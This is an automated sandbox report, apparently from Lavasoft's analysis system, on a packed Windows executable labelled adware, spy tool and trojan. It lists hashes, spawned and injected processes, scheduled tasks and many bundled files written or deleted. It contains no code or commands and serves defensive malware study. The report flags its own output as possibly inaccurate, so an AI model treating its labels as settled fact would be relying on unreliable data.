not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, SpyTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6014e42e22c25611cc80146e840cbe2b
SHA1: 824bdff141a0f1ef1e88e90e2231edf7d5582de9
SHA256: d3427777a18e716497d0695e25f13b2aae15f5e6736f8b9843dec4b327fbaded
SSDeep: 6144:Ke34QYfvbUeqJPShu jeF9sMkL75 ZPPfnE2Qyn2FEtt2NB6 sf:ZYfyUh/a vLF ZPPfnEUnsEWfXsf
Size: 307583 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
upgmsd_re_005010096.exe:1276
nsf2B.tmp:1664
nsf2B.tmp:668
nswA.tmp:1336
gmsd_re_005010096.exe:592
nsr19.tmp:204
nsdF.tmp:1060
fsd34.exe:1692
nsw42.tmp:660
setup.exe:1356
taskkill.exe:1804
taskkill.exe:1796
taskkill.exe:660
nsj32.tmp:1912
amisid.exe:1952
amisid.exe:1844
tasklist.exe:1852
tasklist.exe:324
nss12.tmp:1616
9823.exe:320
nsx36.tmp:1468
encrypt.exe:1060
encrypt.exe:1476
encrypt.exe:1100
encrypt.exe:1584
nsx1C.tmp:1896
nsx1C.tmp:1088
nst25.tmp:1804
nsk6.tmp:204
%original file name%.exe:1736
The SpyTool injects its code into the following process(es):
nsx46.tmp:2724
nso3D.tmp:3724
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process upgmsd_re_005010096.exe:1276 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
The process nsf2B.tmp:1664 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-UGOR9.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-9SIQI.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-LKR89.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\is-FEB6H.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-L9FO9.tmp (8657 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-P9554.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (15278 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (0 bytes)
The process nsf2B.tmp:668 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (3781 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp (0 bytes)
The process nswA.tmp:1336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsnC.tmp (0 bytes)
The process gmsd_re_005010096.exe:592 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
The process nsr19.tmp:204 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1C.tmp (7288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp (0 bytes)
The process nsdF.tmp:1060 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\9823.exe (14988 bytes)
The process fsd34.exe:1692 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
The process nsw42.tmp:660 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc44.tmp (0 bytes)
The process nsx46.tmp:2724 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst49.tmp (19514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\UserInfo.dll (4 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\System.dll (11 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\AnyProtectEx\installer\tempfile.t (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp (0 bytes)
The process setup.exe:1356 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\chrome.7z (1161171 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574 (0 bytes)
The process nsj32.tmp:1912 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\FinalInstaller_dotnet4[1].exe (1479345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
The process nss12.tmp:1616 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (0 bytes)
The process 9823.exe:320 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (1644 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail_live_msn.ico (1592 bytes)
